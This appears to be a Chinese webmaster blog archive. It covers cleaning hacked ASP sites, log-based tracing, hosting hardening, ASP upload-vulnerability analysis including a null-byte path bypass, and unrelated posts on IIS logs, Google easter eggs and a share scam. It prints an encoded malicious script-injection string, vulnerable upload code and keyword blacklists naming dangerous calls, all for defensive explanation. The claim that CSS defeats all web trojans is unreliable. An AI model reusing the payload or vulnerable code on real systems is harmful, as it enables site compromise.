Google AdWords + SEO

网站被上传木马(网站被黑)如何处理

2008-11-16T09:54:23+08:00

  有时会收到一些客户反映网站被黑，或被上传木马，当用户访问网站时就会下载病毒或者木马，杀毒软件弹出病毒的提示。这种情况是以下2种情况导致的。

      第一种情况：客户网站存在文件上传漏洞。导致黑客可以使用这漏洞，上传黑客文件。然后黑客可以对该用户网站所有文件进行任意修改，这种情况比较普遍。针对这种情况，用户需要找技术人员，检查出网站漏洞并彻底修复，并检查看网站是否还有黑客隐藏的恶意文件。

      原因：很多网站都需要使用到文件上传功能，例如很多网站需要发布产品图片等。
文件上传功能本来应该具有严格的限定，例如：只允许用户只能上传JPG、GIF等图片。但由于程序开发人员考虑不严谨，或者直接是调用一些通用的文件上传组件，导致没对文件上传进行严格的检查。

      处理：处理关键是要用户自己知道自己网站哪些地方使用到了文件上传功能。重点针对这个文件上传功能进行检查，同时针对网站所有文件进行检查，排查可疑信息。同时也利用网站日志，对文件被修改时间进行检查。

      1) 查到哪个文件被加入代码: 用户要查看自己网页代码.根据被加入代码的位置，确定到底是哪个页面被黑，一般黑客会去修改数据库连接文件或网站顶部/底部文件，因为这样修改后用户网站所有页面都会被附加代码。

      2) 查到被篡改文件后，使用Ftp查看文件最后被修改时间，例如 Ftp里面查看到conn.asp文件被黑，最后修改时间是 2008-8-22 10:34 分, 那么可以确定在 2008-8-22日10:34 分这个时间，有黑客使用他留下的黑客后门，篡改了你的conn.asp这个文件。到底是哪个文件？可以使用网站日志查出来。使用FTP登陆您的网站空间，Weblog文件夹即为网站日志，并且以日期作为文件名称。下载ex080822.log.gz这个文件。由于日志记录和真实时间有8小时时间差, 所以您要检查的时间是 2:34分左右. 以下是一个日志记录案例.

2008-02-22 02:34:16 W3SVC23 211.155.230.227 GET /favicon.ico
2008-02-22 02:34:29 W3SVC23 211.155.230.227 GET /favicon.ico
2008-02-22 02:34:29 W3SVC23 211.155.230.227 POST /news/uppic/569853.asp
2008-02-22 02:36:03 W3SVC23 211.155.230.227 GET /prod_Detail.asp id=59
2008-02-22 02:38:56 W3SVC23 211.155.230.227 GET /prod_detail.asp id=63

用户可以根据日志判定 /news/uppic/569853.asp 这个文件应该是黑客上传的文件。

      3) 再重复 2) 步. 查看569853.asp文件修改时间,再查出到底是哪个文件导致上传了569853.asp 这个文件，查看到569853.asp 文件修改时间是2008-08-21 06:32分，找到有问题的文件。结果追查到有问题的文件是 uploadPic.inc.asp。
2008-08-20 22:57:37 W3SVC23 211.155.230.227 GET /prod_ListCategory.asp cid=18
2008-08-20 22:58:03 W3SVC23 211.155.230.227 POST /news/admin/uploadPic.inc.asp
2008-08-20 22:08:43 W3SVC23 211.155.230.227 GET /uploadpic/nike.jpg

      4) 就这样循环.最后可以查出是哪个文件有文件上传漏洞，要修复这些文件上传漏洞，彻底检查网站代码，彻底删除黑客其他隐藏的黑客文件。
注意：

       1) 很多用户网站被黑后，只是将被串改的文件修正过来，或重新上传，这样是没多大作用。如果网站不修复漏洞.黑客可以很快再次利用这漏洞，对用户网站再次入侵。
       2) 网站漏洞的检查和修复需要一定的技术人员才能处理，用户需要先做好文件的备份。

第二种情况：

用户本地机器中毒了。修改了用户自己本地的网页文件。然后用户自己将这些网页文件上传到服务器空间上了。这种情况比较少。如是这种情况用户要先彻底检查自己网站。

      1. 病毒特征
这种病毒一般是搜索本地磁盘的文件，在网页文件的源代码中插入一段带有病毒的代码，而一般最常见的方式是插入一个 iframe或script ，然后将这个 iframe 或script的 src 属性指向到一个带有病毒的网址。

      2. 如何检测
1）浏览网站，右键查看源代码，在源代码里搜索 iframe ，看看有没有被插入了一些不是自己网站的页面，如果有，一般就是恶意代码。
2）也是右键查看源代码，搜索 "script" 这个关键字，看看有没有被插入一些不是自己域名下的的脚本，如果有，并且不是自己放上去的，那很可能也有问题。

      3.如何杀毒？
      １)有些人会说用查毒程序查过本地没有发现病毒，这就要看看本地的网站文件是否带有这些恶意代码，如果有，那基本上可以肯定你的机器是曾经中过毒的，这些病毒可能不是常驻内存的，并且有可能执行一次之后就将自己删除，所以用查毒程序查不出来是很正常的。

      ２).就算这些病毒是常驻内存，杀毒程序也可能查不出来，因为这种病毒的原理很简单，其实就是执行一下文件磁盘扫描，找到那些网页文件（如 asp php html）等格式的文件，然后打开它插入一段代码，然后再保存一下。因为它修改的不是什么系统文件，病毒防火墙一般不会发出警告，如果它不是挂在一些系统进程里，而是在某个特定的时刻运行一下就退出，这样被查出的可能性更少。

     ３)手工删除这些病毒的一般方法：
      a. 调出任务管理器，看看有没有一些不知名的程序在运行，如果有，用windows的文件查找功能找到这个文件，右键查看属性，如果这个可执行文件的摘要属性没有任何信息，而自己又不知道是什么东西，那很可能有问题，然后上google搜索一个这个文件的信息，看看网上的资料显示是不是就是病毒，如果是就先将其改名。
      b. 打开注册表编辑器，查看一下
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
有没有一可疑的启动项，有的话就删除。
     c. 查看本地机器的 windows 控制面板，看看“任务计划”那里有没有一些不是自己定义的任务，如果有查看属性，找到这个任务所执行的可执行文件是哪个，重复前面步骤 a 的方法进行查杀。
（通过BAIDU、GOOGLE，可以获得更多关于此类病毒的查杀方法）

      4. 中毒的常见原因：
      一般是因为上了一些烂网站，这些网站有木马，然后机器就中毒了，我们的服务器一般不会中毒的，因为我们的服务器的安全策略已经禁止访问互联网，而且我们工作人员也不可能在服务器上访问乱七八糟的网站，中毒的可能性很少。
至于说其它客户上传了一些有问题的程序然后令服务器中毒也是不成立的，因为普通的客户的IIS进程是没有权限修改其它客户的网站的。

主机10重保护

2008-11-15T19:42:31+08:00

Stream开关设置
　　ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。

Fso开关设置
　　FSO(FileSystemObject)是微软ASP的一个对文件操作的控件，该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。

Ftp权限设置
　　如果你的网站建好后，今后一段时间都不会再用到ftp上传功能，您可以暂时关闭FTP上传。这有助于提高网站的安全，即使ftp密码泄露，黑客也不能操作你空间内的文件。同时系统支持设置拒绝所有IP，只允许某些IP登录。进一步提高安全性。

脚本权限设置
　　您可以设置您的网站支持哪些网站脚本，如果您的网站只使用了asp，您可以设置为只开放asp权限。这样黑客即使上传了php的木马到您的空间也不能运行！最少的权限＝最大的安全！

写入权限设置
　　本系统支持全国领先的目录权限设置，允许关闭网站的写入权限，锁定虚拟主机。对安全有重要意义，例如可以将access数据库放在databases目录，而将wwwroot目录的写入权限关闭，令asp木马根本无法上传，这样比关闭FSO更安全。

IP 限制
　　您可以明确拒绝或授权某些IP地址对您网站的访问。对某些重要的子目录，如论坛的后台管理目录/admin/您可以设置为所有人拒绝访问，只允许您自己的ip访问.这样即使黑客知道了你论坛的超级管理密码，也无法对你的论坛进行管理和破坏！

文件保护
　　您可以设置您要保护的文件，当文件被保护之后，该文件将无法从web访问。您可以使用该功能来保护您的重要文件的安全性，比如ACCESS数据库等。

目录保护
　　通常用户网站被黑（如网页被篡改,文件被盗，被删等）都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。　　所以在无法确认系统是否存在上传漏洞的情况下，只要保证文件上传目录没有脚本运行权限，那么即便黑客将木马上传到您的空间他也无法运行,这样就无法危及您的网站，使您网站更安全。

自动查杀病毒木马
　　功能介绍：如果您的网站存在上传漏洞或注入漏洞，很容易被黑客上传木马，添加病毒代码。查看您的网页源代码，会发现病毒代码一般是：　
等，而黑客通常会在您的网站里面留下后门程序，如海洋顶端asp木马，以便日后再次侵入您的网站。使用该功能，可以轻松将这些病毒木马一网打尽！

服务器端自动杀毒
　　因传统杀毒软件不能有效地识别网页木马，特别是网页木马经常被加壳或制作为变种!所以我司自主开发了专门针对网页木马的杀毒软件，每天晚上自动扫描所有网站。发现木马的，对该文件自动更名;发现iframe病毒的，对病毒代码自动清除;并自动通过电子邮件通知你,让您轻松掌握您的网站情况
(业界独有)

二行代码解决全部网页木马(含iframe/script木马）

2008-11-15T19:29:40+08:00

还是挂马问题，这段时间，我渐渐感到压力，头大，通过QQ或MSN加我的人越来越多，我最近自己的工作本来就忙得不亦乐乎。哎，想想，还是要抽空来来帮帮大家。

　　前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》得到了很多朋友的认可，这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了，现在流行挂

汗死，一连插入了N个一样的

对了，script木马的src一般都是外域的，也就是src是以http打头的，如果是自己网站的script一般都不用加上http；再看看木马的原形，里面还是输出的iframe、JS代码或是其他代码，不管这么多，来多少杀多少。

来跟我写CSS，一一搞定它们,我写了5种不同的方案，大家来测试一下哈：

解决方案１：
复制内容到剪贴板
代码:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理：将　

以下页面代码里含有一个木马地址，而且木马在页面里重复了6次，大家分别用我上面的不同方案测试一下，看看我的研究如何！（此测试有一定的危险性，请务必打好所有补丁再测试）
复制内容到剪贴板
代码:
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
http://www.w3.org/1999/xhtml">

让JS木马的进程迅速中止的CSS代码

我是页面本身的１

我是页面本身的２

我是页面本身的３

其中1.js是自己本站的：
复制内容到剪贴板
代码:
document.write("我是本站的JS文件");
document.write("http://www.baidu.com/images/logo.gif' />");
我的测试环境是：
　　Windows XP SP2 和windows Vista SP1
      IE6/IE7/IE8
      已全部打好补丁。
综上所述，所有目前的挂马方式全都破解了，用CSS就可以解决所有木马问题，访客不会再轻易地中毒了。

    大家也要仔细研究一下，看看我的代码有什么BUG，有的话一定要拿出来讨论，好解决问题！或是各位有其他更好的办法可以拿出来讨论一下。

    很晚了，我要睡觉了。有空再研究。

警惕ASP上传漏洞木马窥视你

2008-11-15T19:19:13+08:00

最近发现很多网站被挂马,而且UPLOAD文件夹里面多了一个569853.asp
出于好奇对被进入的一个网站进行了研究.

发现一个规律

一般是网站上传没正确设置好SESSION或决断文件名;现在这个木马最为常用

常用ASP木马文件名为:569853.asp
病毒代码如下:document.writeln和下面的链上
("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
在模拟分析中发现一般被KC的网站一般存在以下几个问题

打开你的网站WW.XX.COM/上传页面
出现请登录后再使用本功能等 OK首先肯定存在上传漏洞
你给了客户网站后台密码过于简单直接是什么admin admin888一类的,而客户没改过(--直接没话说!)
存在会员功能。可以注册会员
下面两点只要有一点就可以给黑客可乘之机

现在先来说说漏洞的原理

一、FilePath
说到FilePath,有些朋友可能会感到陌生;但要提到动网6.0的上传漏洞,大家一定都很熟悉吧?上传漏洞本质上是由于FILEPath过滤而不严引起的。虽然现在动网已不存在此漏洞,但采用此上传源码的程序还是非常多的。“万豪下载程序”ADS(广告)版块中的Upfile.asp就存在Filepath过滤不严的漏洞,下面让我们一起来分析下它的源码:
<%
dim upload,file,formName,formPath,iCount,filename,fileExt '//定义上传变量
set upload=new upload_5xSoft '//建立上传对象
formPath=upload.form("filepath") '//第一步、获取文件路径,此处是关键。
if right(formPath,1)<>"/" then formPath=formPath&"/"
for each formName in upload.file '//用For读取上传文件
set file=upload.file(formName) '//生成一个文件对象
…………………… '//省略部分代码
fileExt=lcase(right(file.filename,4)) '//从文件名中截取后4位,并转换为小写字符。
if fileEXT<>".gif" and fileEXT<>".jpg" and fileEXT<>".zip" and fileEXT<>".rar" and fileEXT<>".swf"then '//文件扩展名判断
response.write "文件格式不正确　[ 重新上传 ]"
response.end
end if
randomize
ranNum=int(90000*rnd)+10000
filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&fileExt '//第二步、filename由提交的文件路径+年月日的随机文件名+转换后的扩展名组成
if file.FileSize>0 then
file.SaveAs Server.mappath(FileName) '//保存文件
end if
set file=nothing
next
%>
在这段源码中,最关键的是这两句:
1、formPath=upload.form("filepath")
2、filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&fileExt
小知识:变量与常量:所谓变量指在程序的运行过程中随时可以发生变化的值;而常量则恰恰相反,指的是在程序的运行过程中始终保持不变的值。
下面让我们来看一下漏洞是如何形成的:
1. 从变量filepath中获取文件的保存路径。
2. 用路径变量formPath加随机生成的数字及经过判断的扩展名合成一个新的变量,变量Filename就是上传文件保存的路径及名称。
这里举例说明:我们选择“111.jpg”上传,在上传过程中,随文件一起上传的还有FilePath变量,假设其值为“image”,当这些值传到upfile.asp中,filename就变成了:“image/200512190321944973.jpg”。上传成功后,该111.jpg被保存到image文件夹内,文件名也被改成了:“200512190321944973.jpg”。这段流程看起来无懈可击,但还是被牛人研究出了突破方法。什么方法呢?很简单,突破点就在变量身上。如果将其FilePath值改为“image/aa.asp□”,其中“□”表示二进制的00(空的意思),这样,该变量提交给upfile.asp后,Filename值变成了“image/aa.asp□/200512190321944974.jpg”。服务器在读取变量时,因为“□”是二进制的00,所以它认为该变量语句已经结束,“□”后的字符自然也就被忽略了。这样一来Filename就成了:“image/aa.asp”。瞧,漏洞出现了。
关于此漏洞的利用,我们可以使用桂林老兵的上传工具,或者用WinSock抓包,之后记事本保存提交数据并增加、修改相关内容。用WinHex修改空格为二进制,最后用NC提交。具体操作请参阅相关文章。
二、FileName
介绍过FilePath(上传路径)过滤不严的漏洞,再来看一看FileName(上传文件名)过滤不严造成的漏洞,上传文件名过滤不严的形式是多种多样的,这里介绍两种:
1、动易文章
我们来看一下它的上传文件“Upfile_Article.asp”中的部分源码:
<%
Const UpFileType="rar|gif|jpg|bmp|swf|mid|mp3" '//允许的上传文件类型
Const SaveUpFilesPath="../../UploadFiles" '//存放上传文件的目录,注:以上两个常量均在config.asp文件内定义
dim upload,oFile,formName,SavePath,filename,fileExt //变量定义
……………………
FoundErr=false '//此为是否允许上传的变量,初始化为假,表示可以上传。
EnableUpload=false '//此为上传文件扩展名是否合法的变量,初始化为假,表示的是不合法。
SavePath = SaveUpFilesPath '//存放上传文件的目录
……………………
sub upload_0() '//使用化境无组件上传
set upload=new upfile_class '//建立上传对象
……………………
for each formName in upload.file '//用For循环读取上传的文件。
set ofile=upload.file(formName) '//生成一个文件对象
……………………
fileExt=lcase(ofile.FileExt) '//将扩展名转换为小写字符
arrUpFileType=split(UpFileType,"|") '//读取后台定义的允许的上传扩展名
for i=0 to ubound(arrUpFileType) '//第一关,用FOR循环读取arrUpFileType数组。
if fileEXT=trim(arrUpFileType(i)) then '//如果fileEXT是允许上传的扩展名
EnableUpload=true '//EnableUpload为真,表示该文件合法。
exit for
end if
next
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then '// 第二关,验证fileEXT是否为asp、asa、aspx扩展名。
EnableUpload=false '//如果属于这三项之一,那么EnableUpload就定义为假,上传文件扩展名不合法。
end if
if EnableUpload=false then '// 第三关,验证关。如果传递到此的EnableUpload变量为假,则说明上传文件扩展名不合法。
msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
FoundErr=true '//注意:因为文件名不合法,就更改了FoundErr值,由初始的false改为true。
end if
strJS=""
    end if
    response.write ""
%>
<%
end if
set file=nothing
next
set upload=nothing
end if
%>

发现我们的这份代码非常的不安全,通过\0漏洞很快就可以轻松上传自己想要的木马.现在我们在以上代码中附加上传后的文件的验证代码.判断是否该文件存在危险操作及恶意代码.于是我们在源代码中加入以下验证代码:

sFile=server.mappath(FileName)
set MyFile=server.CreateObject("Scripting.FileSystemObject")
set MyText=MyFile.OpenTextFile(sFile, 1) '读取文本文件
sTextAll=lcase(MyText.ReadAll)
MyText.close
'判断用户文件中的危险操作
sStr="script <% .getfolder .createfolder .deletefolder .createdirectory .deletedirectory .saveas wscript.shell script.encode"
sNoString=split(sStr," ")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel=server.CreateObject ("Scripting.FileSystemObject")
filedel.deletefile server.mappath(FileName)
response.write "你的ip和时间已被纪录，由于你曾多次使用该方法对系统进行非法攻击，我们将会把你的数据向广东省公安部及网警报告!"&"攻击IP:"&request.servervariables("remote_addr")&",攻击时间:"&date()&" "&time()
set MyFiletemp=server.CreateObject("Scripting.FileSystemObject")
set wfile=myfiletemp.opentextfile(server.mappath("gjrz.txt"),8)
wfile.writeline date()&" "&time()&" "&request.servervariables("remote_addr")
Response.end
end if
next

即全文代码:

<%
set upload=new upload_file
if upload.form("act")="uploadfile" then
filepath=trim(upload.form("filepath"))
filelx=trim(upload.form("filelx"))

i=0
for each formName in upload.File
    set file=upload.File(formName)

fileExt=lcase(file.FileExt) '得到的文件扩展名不含有.
if file.filesize<250 then
    response.write "请先选择你要上传的文件！　[ 重新上传 ]"
response.end
end if
if (filelx<>"swf") and (filelx<>"jpg") then
    response.write "该文件类型不能上传！　[ 重新上传 ]"
response.end
end if
if filelx="swf" then
if fileext<>"swf"    then
    response.write "只能上传swf格式的Flash文件！　[ 重新上传 ]"
    response.end
end if
end if
if filelx="jpg" then
if fileext<>"gif" and fileext<>"jpg"    and fileext<>"bmp" then
    response.write "只能上传jpg、gif、bmp格式的图片！　[ 重新上传 ]"
    response.end
        end if
end if
if filelx="swf" then
if file.filesize>(3000*1024) then
    response.write "最大只能上传 3M 的Flash文件！　[ 重新上传 ]"
    response.end
end if
end if
if filelx="jpg" then
if file.filesize>(250*1024) then
    response.write "最大只能上传 250K 的图片文件！　[ 重新上传 ]"
    response.end
end if
end if

randomize
ranNum=int(90000*rnd)+10000
filename=filepath&session("useradmin")&"_"&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
%>
<%
if file.FileSize>0 then           ''如果 FileSize > 0 说明有文件数据
    'file.SaveAs Server.mappath(filename)     ''保存文件
    file.SaveToFile Server.mappath(FileName)
    sFile=server.mappath(FileName)
set MyFile=server.CreateObject("Scripting.FileSystemObject")
set MyText=MyFile.OpenTextFile(sFile, 1) '读取文本文件
sTextAll=lcase(MyText.ReadAll)
MyText.close
'判断用户文件中的危险操作
sStr="script <% .getfolder .createfolder .deletefolder .createdirectory .deletedirectory .saveas wscript.shell script.encode"
sNoString=split(sStr," ")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel=server.CreateObject ("Scripting.FileSystemObject")
filedel.deletefile server.mappath(FileName)
response.write "你的ip和时间已被纪录，由于你曾多次使用该方法对系统进行非法攻击，我们将会把你的数据向广东省公安部及网警报告!"&"攻击IP:"&request.servervariables("remote_addr")&",攻击时间:"&date()&" "&time()
set MyFiletemp=server.CreateObject("Scripting.FileSystemObject")
set wfile=myfiletemp.opentextfile(server.mappath("gjrz.txt"),8)
wfile.writeline date()&" "&time()&" "&request.servervariables("remote_addr")
Response.end
end if
next

    'response.write file.FileName&"　　上传成功!　　
"
    'response.write "新文件名："&FileName&"
"
    'response.write "新文件名已复制到所需的位置，可关闭窗口！"
    if filelx="swf" then
        response.write ""
    end if
    response.write ""
%>
<%
end if
set file=nothing
next
set upload=nothing
end if
%>

因此只要他上传的文件中含有:<%,script ,encode等等脚本代码或者ASP代码,通通删除上传的文件.并作出警告.即使他把ASP木马加密也难逃被杀的命运.

ASP上传漏洞防范

2008-11-15T19:12:30+08:00

你的网站是否经常被人上传木马?相信本文会对你有所帮助!
以下是一段很常见的ASP上传代码,尽管限制了上传文件的类型，但只要将要上传的ASP文件后缀改为JPG或其它允许的类型，仍然是可以上传的：

<%
set upload=new upload_file
if upload.form("act")="uploadfile" then
filepath=trim(upload.form("filepath"))
filelx=trim(upload.form("filelx"))

i=0
for each formName in upload.File
set file=upload.File(formName)

fileExt=lcase(file.FileExt) '得到的文件扩展名不含有.
if file.filesize<100 then
response.write "请先选择你要上传的文件！　[ 重新上传 ]"
response.end
end if
if (filelx<>"swf") and (filelx<>"jpg") then
response.write "该文件类型不能上传！　[ 重新上传 ]"
response.end
end if
if filelx="swf" then
if fileext<>"swf" then
response.write "只能上传swf格式的Flash文件！　[ 重新上传 ]"
response.end
end if
end if
if filelx="jpg" then
if fileext<>"gif" and fileext<>"jpg" then
response.write "只能上传jpg或gif格式的图片！　[ 重新上传 ]"
response.end
end if
end if
if filelx="swf" then
if file.filesize>(3000*1024) then
response.write "最大只能上传 3M 的Flash文件！　[ 重新上传 ]"
response.end
end if
end if
if filelx="jpg" then
if file.filesize>(1000*1024) then
response.write "最大只能上传 1000K 的图片文件！　[ 重新上传 ]"
response.end
end if
end if

randomize
ranNum=int(90000*rnd)+10000
filename=filepath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
%>
<%
if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据
'file.SaveAs Server.mappath(filename) ''保存文件

file.SaveToFile Server.mappath(FileName)

''以下代码Agang修改,

sFile=server.mappath(FileName)
set MyFile=server.CreateObject("Scripting.FileSystemObject")
set MyText=MyFile.OpenTextFile(sFile, 1) '读取文本文件
sTextAll=lcase(MyText.ReadAll)
MyText.close
'判断用户文件中的危险操作
sStr=".getfolder .createfolder .deletefolder .createdirectory .deletedirectory .saveas wscript.shell script.encode"
sNoString=split(sStr," ")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel=server.CreateObject ("Scripting.FileSystemObject")
filedel.deletefile server.mappath(FileName)
response.write "你的ip和时间已被纪录，由于你曾多次使用该方法对系统进行非法攻击，我们将会把你的数据向海南省公安部及海口网警报告!"
set MyFiletemp=server.CreateObject("Scripting.FileSystemObject")
set wfile=myfiletemp.opentextfile(server.mappath("gjrz.txt"),8)
wfile.writeline date()&" "&time()&" "&request.servervariables("remote_addr")
Response.end
end if
next

'response.write file.FileName&"　　上传成功!　　
"
'response.write "新文件名："&FileName&"
"
'response.write "新文件名已复制到所需的位置，可关闭窗口！"
if filelx="swf" then
response.write ""
end if
response.write ""
%>
<%
end if
set file=nothing
next
set upload=nothing
end if
%>

但经测试,如果将ASP文件加密,再改为JPG文件,同样还是可以上传,这样需要用到以下的代码,替换上面的:

'判断用户文件中的危险操作
sStr=".getfolder .createfolder .deletefolder .createdirectory .deletedirectory .saveas wscript.shell script.encode. 重命名修改属性文件浏览器新建复制成功参数错误服务器空间下载"

试试,还能上传吗

服务器C盘空间不足？无故死机?关闭服务器HTTPERR日志，降低CPU占用！

2007-11-17T14:33:02+08:00

服务器C盘空间不足？无故死机?关闭服务器HTTPERR日志，降低CPU占用！

默认情况下，2003服务器会把所有IIS访问错误的记录写入 C:\WINDOWS\system32\LogFiles\HTTPERR 下的 log 文件中，如果访问量比较大，可能一段时间后日志文件可能会占满C盘空间，导致服务器死机。同时因为要写入所有的IIS访问记录，如果访问量较大会大大增加服务器CPU占用率

关闭HTTPERR的方法

运行里输入 regedit 进入注册表编辑器
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters]

在右边点鼠标右键新建dword值 EnableErrorLogging 重新启动服务器就可以了

"EnableErrorLogging"=dword:00000000

重起后，2003不再写入HTTPERR日志文件，可以看到服务器CPU占用明显下降！

C:\WINDOWS\system32\LogFiles\ 导致c盘空间不足的问题解决方法

删除 C:\WINDOWS\system32\LogFiles\HTTPERR 和C:\WINDOWS\system32\LogFiles\W3SVC1312124267 当中修改日期非当前日期的文档..
其他的无需删除...
C:\WINDOWS\system32\LogFiles\HTTPERR 是iis日志保存文件.可以关闭iis日志功能.在iis-属性中.
服务器的日志功能很少成为首要的关注对象，但却是日复一日的服务器管理和监视工作不可或缺的助手。IIS 6.0在日志功能方面有许多重大的改进，但遗憾的是，W3SVC日志事件仍不能以本地时间记录。

　　在IIS 6.0中，记录日志的功能已经改为由http.sys实现，http.sys在内核模式下运行。这一改进加快了日志写入速度，同时避免了多个工作进程争用同一日志文件。某些特殊的情况下，http.sys会遇到错误，这时它应该但却不能将日志信息写入Web网站的日志，例如，工作进程正在被回收，禁止http.sys处理用户请求，或者用户试图连接到服务器，但请求中只提供了IIS所需信息的一部分。如果出现这类情况，http.sys将把事件写入一个新的日志文件httperr.log。

　　在排解故障、优化IIS 6.0的过程中，httperr.log日志文件是十分重要的。默认情况下，httperr.log文件保存在\system32\logfiles目录，但可以修改，修改方法是找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters注册子键，在它下面添加一个名为ErrorLoggingDir的字符串值，在ErrorLoggingDir中设置保存日志文件的完整路径。在httperr.log日志文件中可以找到的信息包括：所有的503（服务不可用）错误，空闲连接超时，解析URL时出现的各种错误，最后10个提交给失败的应用程序池的请求。

　　IIS 6.0还拥有一种称为二进制日志的功能，启用这个功能后，IIS 6.0将把Web网站的所有日志信息写入一个二进制格式的日志文件，日志文件的扩展名是.ibl。要启用二进制日志功能，只要把配置文件的W3SVCC/CentralBinaryLoggingEnabled条目设置成ture（1）即可。对于ISP来说，这个功能应该非常有用。ISP的每台机器上可能有1000甚至更多的Web网站，如果每个Web网站每天生成一个日志文件，日志文件的总数很快会达到一个天文数字。微软最近发布的Log Parser 2.0工具能够读取二进制日志文件并生成报告，这个工具可以从http://download.microsoft.com/download/iis50/utility/2.0/nt5xp/en-us/setup.exe下载。Log Parser 2.0还能够读取前面介绍的httperr.log文件并生成报告。

　　从很久以前开始，IIS就允许指定本地服务器上保存日志文件的目录了。不过，虽然IIS 5.0和IIS 4.0的IIS管理器允许在指定日志文件路径的时候输入一个远程服务器的通用命名规范（UNC）的路径，但Web服务器实际上不会把日志保存到远程服务器。只有IIS 6.0才真正支持日志文件路径的UNC路径名。

服务器C盘空间不足的解决方法

找到c:/windows/system32/logfiles/
这个目录下的文件清理干净就可以了.

然后把iis站点的日志存放路径改一下

不要放到C盘
或者选择不保留iis访问日志.

打开iis的站点属性,网站选项卡上有个日志记录,编辑它的属性.能解决以上问题.

问：IIS日志记录文件很大，有什么问题吗？

每天一个日志文件，上百M,会不会引起访问变慢或死机啊？
我们现在就经常出现突然不能访问了，不知是不是这个问题。
一般日志文件就一直任其无限增大的吗？
---------------------------------------------------------------

备份后可以删除。

最好看看日志内容，有没有什么可疑的记录。
---------------------------------------------------------------

日志文件有那么大吗?一般日志文件是都保存在系统盘吗??
---------------------------------------------------------------

在C:\WINDOWS里的system32中

Google隐藏小秘密，让我悄悄告诉你

2007-07-23T13:40:10+08:00

http://www.google.com/microsoft
    微软风格的入口　

    http://www.google.com/mac

    MAC风格的入口

    http://www.google.com/linux

    Linux风格的入口

    http://www.google.com/bsd

    FreeBSD风格的入口

    Google有各种语言的版本，下面这些语言可能是在是稀罕了点儿

    http://www.google.com/intl/xx-klingon/

    克林冈语入口（没看过星际旅行吗？）

    http://www.google.com/intl/xx-bork/

    政治入口？

    http://www.google.com/intl/xx-elmer/

    宗教入口

    http://www.google.com/intl/xx-piglatin/

    小猪入口

    http://www.google.com/intl/xx-hacker/

    黑客专用入口

    Google里还有一个小小的彩蛋游戏，大家自己去看吧！

    http://www.google.com/Easter/feature_easter.html

    下面是一个更有用的彩蛋

    http://froogle.google.com/

    作用：通过特殊的搜索引擎，你可以在网上找到你想购物的网站位置。以及你可以很方便的搜索出同类产品的价格。

    看看世界各地的商品价格，自己再买的时候心底有数多了把

    http://labs.google.com/gviewer.html

    作用：一个小玩具，适合那些连鼠标都懒得动的懒人。当你在google上找到了查询结果后，你可以使用google viewer让结果以自己定义的间隔时间来一条一条自动滚屏。

    http://labs.google.com/cgi-bin/webquotes

    作用：可以搜索出你要查询的内容在internet上被多少其他的网站引用过，可以让你知道internet上其他人对你要查询内容的观点，适合写论文和评论以及特殊用途人使用。

    http://labs.google.com/glossary

    作用：顾名思义了，就是一个查英语缩写语意的工具，google的词汇表

    http://labs1.google.com/gvs.html

    作用：给google打一个电话，说出你要查找的内容，然后google会把你要查询的结果显示出来。给不识字的人用的？

112万元如何掉进“原始股陷阱”

2007-07-20T08:20:46+08:00

【故事背景】
　　日前上海实信产权经纪公司（下称“实信公司”）业务经理施正楠因涉嫌非法经营被检察机关提起公诉。该案上月已在上海浦东新区人民法院开庭审理。检方指控施正楠在未经国家有关主管部门批准取得证券经营许可的情况下，于2005年3月至2005年11月间，在第一证券设立的办公场所内，以上市后获利丰厚为诱导，向社会公众销售未上市公司———四川国鸿信息产业股份有限公司的股权，共计销售金额84万元。其行为已触犯相关法律规定，应当以非法经营罪追究其刑事责任，处五年以下有期徒刑，并处罚金。

　　身为上海最近这波原始股风潮中最大的受害者，秦晓帆接受了采访，向记者讲述了两年前在第一证券营业部首次买入一批“原始股”后，先后投资112万却血本无归的的悲惨经历。

　　误入圈套

　　两年前，赋闲在家的秦晓帆突然接到一个自称是第一证券的人打来的电话，说可以向她介绍最新的投资理财方案。

　　秦晓帆去了第一证券，看到办公室的玻璃门上到处有‘第一证券’的标记，她信以为真。这时，一个自称是证券公司员工叫张婷的女子热情地接待了她：开始时劝她开户炒股，但马上又说炒股收益太低，不如参与他们的另一项“业务”———原始股。“当时介绍我买的是一家叫四川国鸿信息有限公司的原始股。他们告诉我，这种股票一上市至少可翻两三倍，而且上市地点就在国内中小企业板。”

　　其间，另一个业务经理施正楠也凑了上来，狂捧四川国鸿，说连他们自己的员工也买了，甚至把交割单、托管中心卡都给秦晓帆看了看。

